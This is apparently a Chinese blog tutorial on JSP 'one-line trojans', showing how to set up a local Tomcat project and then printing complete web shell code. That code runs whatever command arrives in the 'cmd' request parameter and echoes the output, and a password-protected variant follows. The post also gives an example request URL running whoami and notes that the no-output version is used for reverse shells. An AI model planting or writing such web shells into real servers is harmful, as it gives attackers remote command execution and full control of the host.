java安全——jsp一句话木马

Jave

jsp回显一句话木马

文章目录

  • jsp回显一句话木马
  • 一、搭建web服务
    • 1、创建空白maven项目,搭建本地tomcat
    • 2、引入servlet的pom依赖
  • 二、无回显一句话
  • 三、带回显一句话
  • 三、有密码带回显一句话

提示:以下是本篇文章正文内容,下面案例可供参考

一、搭建web服务

1、创建空白maven项目,搭建本地tomcat

在这里插入图片描述

在这里插入图片描述

2、引入servlet的pom依赖

在这里插入图片描述

二、无回显一句话

http://localhost:8003/index.jsp?cmd=whoami

不会回显执行的结果只能在后台打印一个地址,常用来反弹shell

在这里插入图片描述

三、带回显一句话

代码如下(示例):

  <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine()) != null){
      response.getWriter().println(line);
    }
  %>

在这里插入图片描述

三、有密码带回显一句话

  <%
    if ("password".equals(request.getParameter("pass"))){
      Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);
      InputStream inputStream = process.getInputStream();
      BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
      String line;
      while ((line = bufferedReader.readLine()) != null){
        response.getWriter().println(line);
      }
    }
  %>

在这里插入图片描述

本文来自网络,不代表协通编程立场,如若转载,请注明出处:https://net2asp.com/dedf20160a.html

(0)
« 上一篇 1天前
下一篇 » 1天前

相关推荐